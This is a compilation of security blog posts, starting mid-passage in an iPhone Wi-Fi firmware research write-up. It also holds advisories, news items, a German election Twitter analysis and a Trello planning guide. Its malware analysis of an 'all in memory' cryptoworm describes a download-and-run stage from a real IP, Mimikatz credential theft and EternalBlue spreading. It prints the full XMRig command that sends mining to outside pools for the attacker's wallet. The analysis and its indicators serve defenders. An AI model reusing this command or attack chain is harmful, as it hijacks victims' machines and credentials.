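rom = bytes((i * 7) & 0xFF for i in range(ROM_SIZE))
assert dump_rom(FakeChip(rom)) == rom
```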


Indeed, after inserting the hook and running the scheme detailed above, we are finally presented with a complete copy of the chip’s ROM. Now we can finally move on to analysing the firmware image!

To properly load the firmware into a disassembler, we’ll need to locate the ROM and RAM’s loading addresses, as well as their respective sizes. As we’ve seen in the past, the chip’s ROM is mapped at address zero and spans several KBs. The RAM, on the other hand, is normally mapped at a fixed, higher address.

There are multiple ways in which the RAM’s loading address can be deduced. First, the RAM blob analysed previously embeds its own loading address at a fixed offset. We can verify the address’s validity by attempting to load the RAM at this offset in a disassembler and observing that all the branches resolve correctly. Alternately, we can extract the loading address from the PCIe object we identified earlier in the kernel, as it contains both attributes as fields in the object.

Regardless, both methods yield the same result -- the RAM is loaded at address 0x160000, and is 0xE0000 bytes long:
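With those two values in hand, sanity-checking a candidate pointer (say, a branch target or a leaked address) reduces to a simple range test:

```python
RAM_BASE = 0x160000
RAM_SIZE = 0xE0000

def in_ram(addr):
    """True when addr falls inside the firmware's RAM region."""
    return RAM_BASE <= addr < RAM_BASE + RAM_SIZE

assert in_ram(0x160000)        # first RAM byte
assert in_ram(0x23FFFF)        # last RAM byte
assert not in_ram(0x240000)    # first address past the RAM
assert not in_ram(0x0)         # address zero is ROM, not RAM
```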


Building a Wi-Fi Firmware Debugger


Having extracted the ROM and achieved TCM access capabilities, we can also build a module to allow us to easily interact with the Wi-Fi chip. This module will act as a debugger of sorts for the Wi-Fi firmware, allowing us to gain full read/write capabilities to the Wi-Fi firmware, as well as providing several key debugging features.

Among the features present in our debugger are the abilities to inspect the heap’s freelist, execute assembly code chunks directly on the firmware, and even hook RAM-resident functions.

In the next blog post we’ll continue expanding the functionality provided by this module as we go along, resulting in a more complete research framework.

Wrapping Up


In this blog post we’ve performed our initial investigation into the Wi-Fi stack on Apple’s mobile devices. Using a privileged research platform to poke around the kernel, we managed to locate the Wi-Fi firmware’s TCM mapping in the host, and to extract the Wi-Fi chip’s ROM for further analysis. We also started fleshing out our research platform within the iOS kernel, allowing us to build our very own Wi-Fi firmware debugger, as well as several modules for parsing the kernel’s structures -- useful tools for the next stage of our research!

In the next blog post, we’ll use our firmware debugger in order to continue our exploration of the Wi-Fi chip present on the iPhone 7. We’ll perform a deep dive into the firmware, discover multiple vulnerabilities and develop an over-the-air exploit for one of them, allowing us to gain full control over the Wi-Fi SoC.

QOTD – SEC Chair Clayton on Need for Cooperation

Cybersecurity must be more than a firm-by-firm or agency-by-agency effort. Active and open communication between and among regulators and the private sector also is critical to ensuring the nation’s financial system is robust and effectively protected. Information sharing and coordination are essential for regulators to anticipate potential cyber threats and respond to a major cyberattack, should one arise.
-- Jay Clayton, SEC Chair 

Src: Written Remarks before the Committee on Banking, Housing, and Urban Affairs, United States Senate, September 26, 2017

Malware spam: "Emailing: Scan0xxx" from "Sales" delivers Locky or Trickbot

This fake document scan delivers different malware depending on the victim's location:

Subject:       Emailing: Scan0963
From:       "Sales" [sales@victimdomain.tld]
Date:       Thu, September 28, 2017 10:31 am

Your message is ready to be sent with the following file or link attachments: Scan0963

Note: To protect against computer viruses, e-mail programs may prevent sending or receiving

Enterprise Security Weekly #63 – Temporal Tempura

Paul and John discuss network security architecture. In the news, Google Cloud acquires Bitium, Ixia extends cloud visibility, Lacework now supports Microsoft Windows Server, and more on this episode of Enterprise Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/ES_Episode63

Visit https://www.securityweekly.com/esw for all the latest episodes!

Hack Naked News #142 – September 26, 2017

Tracking cars, iOS 11 patches eight vulnerabilities, Equifax dumps their CEO, High Sierra gets slammed with a 0-day, and more. Jason Wood of Paladin Security discusses an email DDoS threat on this episode of Hack Naked News!

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode142

Visit http://hacknaked.tv for all the latest episodes!

Advanced ‘all in memory’ CryptoWorm

Introduction.

Today I want to share a nice malware analysis with an interesting flow. The "interesting" adjective comes from the abilities this sample owns: exploitation capabilities, heavy obfuscation, and the use of advanced techniques to steal credentials and run commands.

The analyzed sample was provided by a colleague of mine (Alessandro), who received the first stage by email. A special thanks to Luca and Edoardo for recognizing XMRig during the last infection stage.

General View.

The following image shows a general view of the entire attack path. As you can see from the picture, the flow is complex: many specific artifacts are involved across the attack phases. The initial stage abuses the user's inexperience, leading him or her to click on a first-stage file called (in my case) y1.bat. Nowadays email is one of attackers' favorite delivery vectors, and it is easily used to deliver malicious content. Once the first stage is run, it downloads and executes a second-stage file called info6.ps1: a heavily obfuscated PowerShell script which drops (by de-obfuscating them directly from its body) three internal resources:
  1. Mimikatz.dll. This module is used to steal administrative user credentials.
  2. Utilities. This module is used to scan internal networks in order to propagate the infection; it runs several internal utilities such as (but not limited to) de-obfuscation routines, array sorting, and exploit launching. This module is also used to drop and execute an additional file (from the same server) named info.vbs.
  3. Exploits. This module is a set of known exploits, such as eternalblue7_exploit and eternal_blue_powershell, used from the initial stage of the attack to infect internal machines.
Full Stage Attack Path

The last stage (info.vbs) drops and runs an executable file which has been recognized as XMRig. XMRig is an open-source Monero CPU miner, freely available on GitHub. The infection tries to propagate itself by scanning and attacking internal resources through the Exploits module, while the XMRig module mines Monero cryptocurrency, giving the attacker fresh "crypto money" at the victims' expense.

Analysis.

A simple but still "working" .bat file is propagated to the victim by email or message. Once the user clicks on it, the .bat file runs the following command, spawning a PowerShell that downloads and runs a script called info6.ps1 from http://118.184.48.95:8000/

Stage1: Downloads and Run 
The downloaded PowerShell file is clearly divided into two macro blocks, both of them obfuscated. The following image shows the two visual sections, which I am going to call "half up" (the section before the "new line") and "half down" (the section after the "new line").

Stage2: Two Visual Sections to be explored
While the "half up" section fairly clearly appears to be a Base64-encoded text file, the "half down" section looks like it was encoded through a crafted function which, fortunately, appears in clear text at the end of the file. By editing that function it is possible to modify the decoding process, making it save the decoded text file directly to a desired folder. The following image shows the decoded second stage "half down" section.

Decoded Second Stage "Half Down"
Analyzing the section code, it is easy to see that the main functions used are dynamically extracted from the file itself by performing substring operations on its content.


$funs=$fa.SubsTrIng(0,406492)
$mimi=$fa.sUBStrInG(406494,1131864)
$mon=$fa.suBstrING(1538360,356352)
$vcp=$fa.sUBStRiNG(1894714,880172)
$vcr=$fa.sUBstrINg(2774888,1284312)
$sc=$fa.sUBsTrinG(4059202)
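The same carving can be reproduced offline; the sketch below mirrors those substring calls over a toy payload (the (offset, length) pairs here are illustrative, the real ones are listed above):

```python
def carve(blob, layout):
    """Split one concatenated payload into named parts.

    layout maps a name to (offset, length); length None means 'to the
    end', matching the single-argument SubString call used for $sc.
    """
    parts = {}
    for name, (off, length) in layout.items():
        parts[name] = blob[off:] if length is None else blob[off:off + length]
    return parts

# Toy payload: three concatenated regions, like the real $fa string.
blob = b"FUNS" + b"MIMI" * 2 + b"SC-PAYLOAD"
parts = carve(blob, {
    "funs": (0, 4),
    "mimi": (4, 8),
    "sc":   (12, None),
})
assert parts["mimi"] == b"MIMIMIMI"
assert parts["sc"] == b"SC-PAYLOAD"
```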

  
The content of the $fa variable, and every function related to it, is placed in the "half up" section, which after being decoded looks like the following image.

Decoded Second Stage "Half Up"
The second stage "half up" code is borrowed from Kevin Robertson (Irken); the attacker reused many useful functionalities from Irken, including the Invoke-TheHash routine, which can be used through SMB to execute commands or to execute code directly with special rights.
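As an aside, recovering the "half up" blob in the first place is mechanical: a stock Base64 decode and a write to disk. A minimal sketch, with a toy payload in place of the real blob:

```python
import base64

def decode_half_up(blob_b64, out_path=None):
    """Decode the Base64 'half up' blob and optionally save it to disk."""
    decoded = base64.b64decode(blob_b64)
    if out_path is not None:
        with open(out_path, "wb") as f:
            f.write(decoded)
    return decoded

# Toy round-trip standing in for the real second-stage content.
sample = base64.b64encode(b"function Get-Creds { ... }")
assert decode_half_up(sample) == b"function Get-Creds { ... }"
```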

A surprisingly interesting line of code is found in the same stage (second stage, "half down"): NTLM= Get-creds mimi mimi, where the Get-creds function (coming from the Base64-decoded "half up") runs a DLL function using the reflection technique. By definition, then, the mimi parameter has to be a DLL file included somewhere in the code. Let's grab it by running the following code: $fa.sUBStrInG(406494,1131864), where 406494 is the starting character and 1131864 is the length of the chunk to be interpreted as a dynamically loaded library. Fortunately, the dropped DLL is a well-known library, widely used in penetration testing, named Mimikatz. It is clear that the attacker uses the Mimikatz library to grab user (and eventually administrator) passwords. Once the password-stealing activity is done, the malware starts to scan internal networks for known vulnerabilities such as MS17-010. The included exploits appear to be borrowed from tevora-threat and woravit, since the same pieces of code, the same comments and the same variable names were found. If the malware finds a vulnerable machine on the local area network, it tries to infect it by injecting itself (info6.ps1) through EternalBlue, and then begins its execution from the second stage.

On the same thread, the malware drops and runs a .vbs file (the third stage) and gains persistence through WMIClass as a service.

Introducing the Third Stage
The info.vbs drops and executes from itself a compiled version of XMRig, renamed with the innocuous-looking string taskservice.exe. Once the compiled PE file (XMRig) is in place, the new stage starts it by running the following commands.

Third Stage Execution of Monero Miner
The clear-text Monero address is visible in the code. Unfortunately, the Monero address is not trackable so far.

Monero address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE

and the used server is: stratum+tcp://pool.supportxmr.com:80
w.run "%temp%\taskservice.exe  -B -o stratum+tcp://pool.supportxmr.com:80 -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE  -o stratum+tcp://mine.xmrpool.net:80  -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -o stratum+tcp://pool.minemonero.pro:80   -u  46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE -p x" ,0
Many other interesting sections could be analyzed, but for now let's stop here.

IOC.

Please find some of the most interesting IoCs below, for your convenience.

- URL: http://118.184.48.95:8000/
- Monero Address: 46CJt5F7qiJiNhAFnSPN1G7BMTftxtpikUjt8QXRFwFH2c3e1h6QdJA5dFYpTXK27dEL9RN3H2vLc6eG2wGahxpBK5zmCuE
- Sha256: 19e15a4288e109405f0181d921d3645e4622c87c4050004357355b7a9bf862cc
- Sha256: 038d4ef30a0bfebe3bfd48a5b6fed1b47d1e9b2ed737e8ca0447d6b1848ce309

Conclusion.

We are facing one of the first complex deliveries of cryptocoin-mining malware. Everybody knows about CryptoMine, BitCoinMiner and Adylkuzz, malware which basically dropped a coin miner on the target machine. So if you are wondering, "Why, Marco, do you write 'one of the first'?" -- well, I actually wrote one of the first "complex" deliveries. The usual coin-mining malware arrives with no propagation module, no exploitation module and no file-less techniques. The way this Monero CPU miner has been delivered, by contrast, includes advanced in-memory techniques: the unpacked malware is never saved to the hard drive (a technique to bypass some anti-virus products) but is inflated directly in memory and called directly from memory itself.

We can consider this malware the latest generation of -all in memory- CryptoWorm.

Another interesting observation, at least from my personal point of view, concerns the first stage. Why did the attacker include this seemingly useless stage? It appears to serve no purpose at all: it's a mere dropper with no controls nor evasions. The attacker could have delivered just the second stage directly, assuring a stealthier network fingerprint. So why did the attacker decide to deliver the CryptoWorm through the first stage? Maybe the first stage is part of a bigger framework? Are we facing a new generation of malware generator kits?

I won't try to answer such questions right now; rather, I'd like to leave my readers thinking about them.

Have fun

Cryptopp Crypto++ 5.6.4 octets Remote Code Execution Vulnerability

Crypto++ (aka cryptopp and libcrypto++) 5.6.4 contained a bug in its ASN.1 BER decoding routine. The library allocates a memory block based on the length field of the ASN.1 object. If there are not enough content octets in the ASN.1 object, the function fails and the memory block is zeroed even if it is unused. There is a noticeable delay during the wipe for a large allocation.
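The hardening is straightforward in principle: validate that the declared length is actually backed by content octets before allocating. A hedged illustration of that check follows; this is a simplified definite-length parser for demonstration, not Crypto++'s actual code:

```python
def ber_read_length(data, pos):
    """Parse a BER definite length at data[pos], returning (length, new_pos).

    Raises ValueError when the declared length exceeds the bytes that
    actually remain -- the check whose absence lets a truncated object
    drive a huge allocation (and later, a slow wipe).
    """
    first = data[pos]
    pos += 1
    if first < 0x80:                      # short form: length in one byte
        length = first
    else:                                 # long form: next (first & 0x7F) bytes
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(data):
            raise ValueError("malformed length field")
        length = int.from_bytes(data[pos:pos + n], "big")
        pos += n
    if length > len(data) - pos:
        raise ValueError("length exceeds remaining content octets")
    return length, pos

# A truncated OCTET STRING: claims 0x1000 content bytes, provides none.
bad = bytes([0x04, 0x82, 0x10, 0x00])
try:
    ber_read_length(bad, 1)
    raised = False
except ValueError:
    raised = True
assert raised
```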

Phpipam 1.2 Execute Code Cross Site Scripting Vulnerability

Multiple Cross-Site Scripting (XSS) issues were discovered in phpipam 1.2. The vulnerabilities exist due to insufficient filtering of user-supplied data passed to several pages (instructions in app/admin/instructions/preview.php; subnetId in app/admin/powerDNS/refresh-ptr-records.php). An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website.
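The generic fix for this class of bug is to escape user-supplied values before they reach the page. The sketch below shows the idea in Python for illustration only; phpipam itself is PHP, where htmlspecialchars() plays the same role, and the wrapper markup here is hypothetical:

```python
import html

def render_instructions(user_supplied):
    """Embed a user-controlled value into HTML safely by escaping it."""
    return "<div class='preview'>%s</div>" % html.escape(user_supplied)

payload = "<script>alert(1)</script>"
out = render_instructions(payload)
assert "<script>" not in out          # raw markup never reaches the page
assert "&lt;script&gt;" in out        # it arrives escaped instead
```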

QOTD – SEC Chair Clayton on Cyber Risk Disclosures

[W]e are continuing to examine whether public companies are taking appropriate action to inform investors, including after a breach has occurred, and we will investigate issuers that mislead investors about material cybersecurity risks or data breaches.
-- Jay Clayton, SEC Chair 

Src: Written Remarks before the Committee on Banking, Housing, and Urban Affairs, United States Senate, September 26, 2017

Malware spam: "AutoPosted PI Notifier"

This spam has a .7z file leading to Locky ransomware.

From:      "AutoPosted PI Notifier" [NoReplyMailbox@redacted.tld]
Subject:      Invoice PIS9344608
Date:      Tue, September 26, 2017 5:29 pm

Please find Invoice PIS9344608 attached.

The number referenced in the spam varies, but attached is a .7z archive file with a matching filename. In turn, this contains one of a number of malicious VBS

“Preparing for Cyber Security Incidents”

This blog post was written by ICS515 instructor, Kai Thomsen. Talk with any incident responder and you'll learn that there are a few less glamorous parts of the job. Writing the final report and preparing in advance for an incident are probably the top contenders. In this article I want to focus on preparation and explain to … Continue reading Preparing for Cyber Security Incidents

Hyperbole in Breach Reporting

While reading the news this morning about yet another successful data breach, I couldn't help but wonder if the hyperbole used in reporting about data breaches is stifling our ability to educate key stakeholders on what they really need to know.

Today's example is about a firm that many rely on for security strategy, planning, and execution. The article I read stated that they were "targeted by a sophisticated hack" but later explains that the attacker compromised a privileged account that provided unrestricted "access to all areas". And, according to sources, the account only required a basic password with no two-step or multi-factor authentication. That doesn't sound too sophisticated, does it? Maybe they brute-forced it, or maybe they just guessed the password (or found it written down in an office?)

It reminded me of an attack on a security vendor back in 2011. As I recall, there was a lot of talk of the sophistication and complexity of the attack. It was called an Advanced Persistent Threat (and maybe some aspects of it were advanced). But, when the facts came out, an employee simply opened an email attachment that introduced malware into the environment - again, not overly sophisticated in terms of what we think a hack to be.

The quantity, availability, and effectiveness of attack techniques are enough to make anyone uncomfortable with their security posture. I previously wrote about a German company who, in a breach response, wrote that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." CISOs are being told that they should expect to be breached. The only questions are about when and how to respond. It makes you feel like there's no hope; like there's no point in trying.

However, if you look at the two examples above that were described as highly sophisticated, they may have been avoided with simple techniques such as employee education, malware detection, and multi-factor authentication. I don't mean to over-simplify. I'm not saying it's all easy or that these companies are at-fault or negligent. I'm just calling for less hyperbole in the reporting. Call out the techniques that help companies avoid similar attacks. Don't describe an attack as overly sophisticated if it's not. It makes people feel even more helpless when, perhaps, there are some simple steps that can be taken to reduce the attack surface.

I'd also advocate for more transparency from those who are attacked. Companies shouldn't feel like they have to make things sound more complicated or sophisticated than they are. There's now a growing history of reputable companies (including in the security industry) who have been breached. If you're breached, you're in good company. Let's talk in simple terms about the attacks that happen in the real world. An "open kimono" approach will be more effective at educating others in prevention. And again, less hyperbole - we don't need to overplay to emotion here. Everyone is scared enough. We know the harsh reality of what we (as security professionals) are facing. So, let's strive to better understand the real attack surface and how to prioritize our efforts to reduce the likelihood of a breach.

QOTD – Raskin on Cybersecurity as Shared Responsibility

Understanding and dealing with the cyber threat has, due to your efforts, seeped from the IT shop and into the CEO shop.  Responsibility is now shared. In fact, this new shared responsibility, among IT experts, the CEO, and the board of directors, has been the most noticeable trend in governance from my time in the industry, in state government, and in the federal government.  Bankers rarely used to talk to me much about cybersecurity.  Now, this is one topic that comes up every day.
-- Treasury Deputy Secretary Sarah Bloom Raskin

Src: Remarks of Deputy Secretary Raskin at The Texas Bankers’ Association Executive Leadership Cybersecurity Conference

Twitter Forensics From The 2017 German Election

Over the past month, I’ve pointed Twitter analytics scripts at a set of search terms relevant to the German elections in order to study trends and look for interference.

Germans aren’t all that into Twitter. During European waking hours Tweets in German make up less than 0.5% of all Tweets published.

Data collected from the 1% sample stream (gardenhose)

Over the last month, Twitter activity around German election keywords has hovered between 2 and 5 Tweets per second. Exceptions only occurred during the TV debate (Sunday, September 3rd 2017) and on the day of voting (Sunday, September 24th 2017). Surprisingly, Tweet volumes were still low on Saturday, September 23rd 2017 – the day before votes were cast.

Here’s how things looked on Friday and Saturday:

Prior to polls closing on Sunday, Tweet volumes reached a sustained 10 Tweets per second. Once exit polls were announced, volumes exploded.

That sudden drop is my script not handling the volume all too well

Over the past month, topics related to the AfD party were pushed rather heavily on Twitter. This snapshot, taken on Thursday 21st September, is pretty similar to every one observed during the whole month.

Here’s an example of another trend I observed throughout the entire month regarding #afd hashtag volumes:

Notice that the Tweet volumes follow an organic pattern, trailing off during night hours. This contrasts with what I observed during the French elections earlier this year, where the #macronleaks hashtag was pushed by bots and maintained a constant volume regardless of the time of day. Despite the high volume of AfD-related Twitter content being posted, AfD didn’t show up in Twitter’s own German trends at any point.

The terms “migrant”, “refugee”, “islam” were mentioned a fair bit in Tweets. Here’s what happened over the weekend.

Ben Nimmo of @DFRLab noticed that a hashtag named #wahlbetrug (election fraud) was being amplified by commercial Twitter bots on Saturday. This story was also picked up by the German publication Bild. My scripts also saw the hashtag briefly enter the top 10 during that day.


Here’s a Tweet timeline of this hashtag since its appearance.

Looking at a timeline of Tweets using this hashtag shows the presence of certain more active accounts pushing this message.

Accounts retweeting Tweets containing the #wahlbetrug hashtag

Accounts replying to Tweets containing #wahlbetrug

Shortly after exit polls were published, the hashtag #fckafd surfaced.

The timeline of this particular hashtag is distinctly different.

However a number of highly active amplifiers were involved in both cases.

Highly active amplifiers of the #fckafd hashtag

Highly active amplifiers of the #wahlbetrug hashtag

This data illustrates how tricky it is to automate the discovery of artificially amplified Tweets. While the #wahlbetrug hashtag was indeed amplified by paid commercial botnets, it didn’t make a splash, and Twitter users would most likely have needed to go searching for pro-AfD Tweets to find it.

A few Twitter users posted very actively during the campaign. Over the weekend, @Teletubbies007, @Jensjehagen, and @nanniag were very active.

@Teletubbies007 was the top tweeter of the #AfD, #btw17, #gehwaehlen, #reconquista, #traudichdeutschland, #wahlbeobachter, and #weidel hashtags.

@Jensjehagen published the most retweets over the weekend.

The @AfD account was the most mentioned Twitter account.

Tools for automating Twitter activity (such as IFTTT) appeared in the top 10 of sources captured during the weekend.

Tweets published by highly active accounts made up about 3.5% of all traffic during the weekend. I had no accurate way of measuring the number of Tweets originating from commercial bot nets, and hence can’t give an estimation as to how much traffic those were responsible for.

My scripts were also configured to look for specific patterns in Tweets and metadata associated with users’ accounts in order to calculate how much activity originated from “alt-right” groups pushing a right-wing agenda. Rough calculations from this data suggest that as much as 15% of all Twitter traffic associated with the German election fit this pattern.

Of the roughly 1.2 million Tweets processed between Friday afternoon and Sunday night, about 170,000 Tweets were matched by that bit of logic. These Tweets originated from about 3,300 accounts. This traffic was enough to generate the results seen in this article, but only to those looking at Twitter streams with automated tools, such as the ones I’m using.
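The matching logic itself can be as simple as keyword tests over the Tweet text and the author's profile description. The sketch below shows how such a share might be computed; the keyword list and the sample Tweets are illustrative only, not the patterns used in the real analysis:

```python
KEYWORDS = ("maga", "patriot", "altright")   # illustrative only

def matches_pattern(tweet):
    """Crude classifier: keyword hit in the text or profile description."""
    haystack = (tweet["text"] + " " + tweet["profile"]).lower()
    return any(k in haystack for k in KEYWORDS)

def matched_share(tweets):
    """Fraction of the captured Tweets that match the pattern."""
    hits = sum(1 for t in tweets if matches_pattern(t))
    return hits / len(tweets)

tweets = [
    {"text": "Wahl heute!", "profile": "Journalist"},
    {"text": "#AfD", "profile": "Patriot, MAGA"},
    {"text": "Ergebnisse", "profile": ""},
    {"text": "altright news", "profile": ""},
]
assert matched_share(tweets) == 0.5
```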

Of note were a few videos and URLs that received a fair amount of retweets. The most obvious of these was a video posted by V_of_Europe showing an immigrant removing election campaign posters.

This was the second most retweeted Tweet I could find from the weekend (pertaining to the election itself). This Tweet was also pushed in other languages.

Another notable Tweet that showed up earlier in the weekend was a story about Merkel being booed at her final campaign rally in Munich. It didn’t get a whole lot of traction, though.

Plenty of links were shared to non-authoritative news sources. Here’s just one example…

…which was shared by this account…

Pay close attention to this user’s profile description

And on the same note, during the weekend, I saw plenty of non-German accounts Tweeting in German, and pushing links to questionable news sources.

I also captured plenty of pro-Trump accounts posting in English.

Another interesting story that failed to gain traction was one about an election results leak prior to the end of voting.

Across the duration of my analysis, 200,000 individual URLs were shared. Around 418,000 Tweets contained those URLs. Of those Tweets, only some 500 linked to questionable political content, which were shared in about 4,000 Tweets. Of the 400,000 unique Twitter users observed participating in this discussion, about 3,000 users were responsible for sharing “fake news” links. By and large, the accounts sharing these links didn’t look like bots.

Merkel was the most seen word in Tweets that shared links to political agenda articles.

Overall, German language Tweets made up roughly 60% of all Tweets during the run-up to the election.

At the time of writing, the most retweeted Tweet I can find pertaining to the election is this one, which has already received over 10,000 retweets.

Also, it’s nice to see that Russians themselves have a sense of humor when it comes to all the allegations of election interference.

Given the lack of German participation on Twitter, it seems to me that the heavy right-wing messaging push that’s been going on during the German election cycle has been more about recruiting new members into the alt-right than it’s been about election interference.

The Hay CFP Management Method

By Andrew Hay, Co-Founder and CTO, LEO Cyber Security.

I speak at a lot of conferences around the world. As a result, people often ask me how I manage the vast number of abstracts and security call-for-papers (CFP) submissions. So I thought I’d create a blog post to explain my process. For lack of a better name, let’s call it the Hay CFP Management Method. It should be noted that this method could be applied to any number of things, from blog posts to white papers and scholastic articles to news stories. I have successfully proven this methodology for both myself and my teams at OpenDNS, DataGravity, and LEO Cyber Security. Staying organized helped manage the deluge of events, submitted talks, and important due dates, in addition to helping me keep track of where in the world my team was and what they were talking about.

I, like most people, started managing abstracts and submissions by relying on email searches and documents (both local and on Google Drive, Dropbox, etc.). Unfortunately, I didn’t find this scaled very well as I kept losing track of submitted vs. accepted/rejected talks and their corresponding dates. It certainly didn’t scale when it was applied to an entire team as opposed to a single individual.

Enter Trello, a popular (and freemium) web-based project management application that utilizes the Kanban methodology for organizing projects (boards), lists (task lists), and tasks (cards). In late September I start by creating a board for the upcoming year (let’s call this board the 2018 Conference CFP Calendar) and, if not already created, a board to track my abstracts in their development lifecycle (let’s call this board Talk Abstracts).

Within the Talk Abstracts board, I create several lists to act as swim lanes for my conference abstracts and other useful information. These lists are:

* Development: These are talks that are actively being developed and are not yet ready for prime time.
* Completed: These are talks that have finished development and are ready to be delivered at an upcoming event.
* Delivered: These are talks that have been delivered at least once.
* Misc: This list is where I keep my frequently requested form information such as my short bio (less than 50 characters), long bio (less than 1,500 characters), business mailing address (instead of browsing to your corporate website every time), and CISSP number (because who can remember that?).
* Retired: As a personal rule, I only use a particular talk for one calendar year. When I feel as though the talk is stale, boring, or stops being accepted, I move the card to this list. That’s not to say you can’t revive a talk or topic in the future as a “version 2.0”. This is why keeping the card around is valuable.

Within the 2018 Conference CFP Calendar board, I create several lists to act as swim lanes for my various CFPs. These lists are:

* CFP open: This is where I put all of the upcoming conference cards that I know about even if I do not yet know the exact details (such as location, CFP open/close, etc.).
* CFP closes in < 30 days: This is where I put the upcoming conference cards that have a confirmed closing date within the next 30 days. Note, it is very important to record details in the cards such as closing date, conference CFP mechanism (e.g. email vs. web form), and any related URLs for the event.
* Submitted: These are the conferences that I have submitted to and the associated cards. Note, I always provide a link to the abstract I submitted as a way to remind myself what I’m talking about.
* Accepted: These are the accepted talk cards. Note, I always put a copy of the email (or link to) acceptance notification to record any details that might be important down the road. I also make sure to change the date on the card to that of the speaking date and time slot to help keep me organized.
* Attending but not presenting: This is really a generic catch-all for events that I need to be at but may not be speaking at (e.g. booth duty, attending training, etc.). The card and associated dates help keep my dance card organized.
* Accepted but backed out: Sometimes life happens. This list contains cards of conference submissions that I had to back out of for one reason or another. I keep these cards in their own column to show me what was successfully accepted and might be a fit for next year in addition to the reason I had to back out (e.g. conflict, personal issue, alien abduction, etc.).
* Completed: This list is for completed talk cards. Again, I keep these to reference for next year’s board as it provides some ballpark dates for when the CFP opens, closes, as well as the venue and conference date.
* Rejected: They’re not all winners and not everybody gets every talk accepted. In my opinion, keeping track of your rejected talks is as important as (if not more important than) keeping track of your accepted talks. Not only does it allow you to see what didn’t work for that particular event, but it also allows you to record reviewer feedback on the submission and maybe submit a different style or type of abstract in the future.
* Not doing 2018: This is the list where I put conference cards that I’ve missed the deadline on (hey, it happens), cannot submit to because of a conflict, or simply choose to not submit a talk to.

It should be noted that I keep the above lists in the same order every year to help minimize my development time against the Trello API for my visualization dashboard (which I will explain in a future blog post). This might sound like a lot of work but once you’ve set this board up you can reuse it every year. In fact, it’s much easier to copy last year’s board than starting fresh every year, as it brings the cards and details over. Then all you need to do is update the old cards with the new venue, dates, and URLs.
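Copying last year's board can even be scripted: Trello's REST API lets you pass idBoardSource when creating a board to clone an existing one, with keepFromSource carrying the cards over. A minimal sketch (the board name, IDs, key, and token below are placeholders you would supply yourself):

```python
import urllib.parse
import urllib.request

API = "https://api.trello.com/1/boards/"

def copy_board_params(new_name, source_board_id, key, token):
    """Query parameters for Trello's board-creation endpoint.

    idBoardSource asks Trello to clone an existing board;
    keepFromSource="cards" brings last year's cards along."""
    return {
        "name": new_name,
        "idBoardSource": source_board_id,
        "keepFromSource": "cards",
        "key": key,
        "token": token,
    }

def copy_board(new_name, source_board_id, key, token):
    # POST to the boards endpoint with the parameters above.
    qs = urllib.parse.urlencode(
        copy_board_params(new_name, source_board_id, key, token))
    req = urllib.request.Request(API + "?" + qs, method="POST")
    with urllib.request.urlopen(req) as resp:
        return resp.read()

# Usage (placeholder values):
# copy_board("2019 Conference CFP Calendar", "<last-year-board-id>",
#            "<api-key>", "<api-token>")
```

Because the lists come over in the same order, a dashboard built against the API keeps working against the new board unchanged.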

Now that we have our board structure created we need to start populating the lists with the cards – which I’ll explain in the next blog post. In addition to the card blog post, I’ll explain two other components of the process in subsequent posts. For reference, here are the upcoming blog posts that will build on this one:

* Individual cards and their structure
* Moving cards through the pipeline
* Visualizing your board (and why it helps)

The post The Hay CFP Management Method appeared first on LEO Cyber Security.

Startup Security Weekly #56 – A Huge Week

Don Pezet and Tim Broom of ITProTV join us. In the news, building successful products, the most important startup question, and updates from McAfee, Slack, ThreatStack, and more on this episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode56

Visit https://www.securityweekly.com/ssw for all the latest episodes!

Phantom RDoS Might Be a Fake Ploy, But Beware

A group calling itself Phantom Squad has launched an email-based ransom DDoS (RDoS) extortion campaign against thousands of companies across the globe in the past week. They are threatening to launch DDoS attacks on their target victims on September 30 unless each victim pays about $700 in bitcoin. Fortunately, it appears this is only a group of extortionists making idle threats. Security experts predict that this group’s bark is worse than its bite; i.e., they doubt that Phantom Squad has the technical power to actually launch multiple DDoS attacks on various targets. Unfortunately, there are hackers out there who do real damage by installing ransomware and launching DDoS attacks, and such attacks are becoming all too common.

DDoS and ransomware attacks often go hand in hand, and they can take two forms: 1) a threat of DDoS unless the victim pays the extortion fee or 2) a DDoS attack that precedes the ransomware installation. In most cases, it is the latter. A short, sub-saturating DDoS attack, which usually lasts less than five minutes, can serve as a smokescreen that distracts IT security staff from a more dangerous infiltration of the network. While IT staff scramble to troubleshoot “noise” on the network, hackers can find pathways and test for vulnerabilities within a network which can later be exploited through other techniques. They can subtly take down a firewall and install malware that may “sleep” on the network until it is remotely activated. Also, some low-threshold DDoS attacks go completely unnoticed by IT security staff.

If your company is unlucky enough to be the target of an RDoS attack, here are some basic rules to follow:

  1. Don’t pay the ransom. You can’t trust that hackers will honor their word and not launch a DDoS attack on you. Furthermore, by rewarding the hacker’s bad behavior you would be encouraging it; they (or other cyber criminals) are likely to hit you a second time in the future, or to hit another company.
  2. Report the incident to local law enforcement.
  3. Patch software, firmware and operating systems.
  4. Train your employees to know how to avoid cyber threats such as phishing emails.
  5. Take a proactive stance to prevent the threat of a future DDoS attack. Automated DDoS mitigation technology can instantly detect and block DDoS attacks, without blocking any of the good traffic, giving your company peace of mind.

Some of Corero’s customers have experienced cyber extortion attempts and, in cases where the hackers did launch a DDoS attack against their network after our customer did not pay a ransom, the Corero SmartWall® Threat Defense System held strong and fended off the attacks.

For more information, contact us.


QOTD – Admiral Rogers on Cyber War

Cyber war is not some future concept or cinematic spectacle, it is real and here to stay.
[...]
Conflict in the cyber domain is not simply a continuation of kinetic operations by digital means, nor is it some Science Fiction clash of robot armies.

-- Admiral Michael Rogers, Commander of US Cyber Command,
